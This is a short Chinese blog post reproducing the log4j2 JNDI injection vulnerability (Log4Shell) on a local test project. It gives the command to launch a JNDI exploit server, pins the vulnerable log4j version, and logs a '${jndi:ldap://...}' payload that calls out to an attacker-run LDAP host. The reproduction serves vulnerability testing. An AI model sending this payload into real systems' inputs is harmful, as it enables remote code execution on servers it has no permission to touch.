log4j2 JNDI注入漏洞问题复现

最近大家应该都有被log4j2的JNDI注入漏洞搞的心烦意乱，当程序将用户输入的数据进行日志输出时，即可触发此漏洞，成功利用此漏洞可以在目标服务器上执行任意代码。

以下为改问题的复现方法：

1、首先下载JNDI-Injection 起 RMI 或者 LDAP 服务

①前往这里下载

②使用以下命令启动服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar

 如下为启动后的截图，马赛克仅为我的ip

2、本地新建一个maven项目

①pom引用如下

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
	<artifactId>log4j-core</artifactId>
	<version>2.12.1</version>
</dependency>
<dependency>
	<groupId>org.apache.logging.log4j</groupId>
	<artifactId>log4j-api</artifactId>
	<version>2.12.1</version>
</dependency>

 ②直接使用main方法输出日志，代码如下，你的ip 需要自己修改：

public class App {
	private static final Logger logger = LogManager.getLogger(App.class);
	public static void main(String[] args) {
		logger.error(" ${jndi:ldap://你的ip:1389/log4jtest}");
	}
}

3、ldap服务端有日志输出，则说明问题复现，如下截图

最后

以上就是害怕美女为你收集整理的log4j2 JNDI注入漏洞问题复现的全部内容，希望文章能够帮你解决log4j2 JNDI注入漏洞问题复现所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。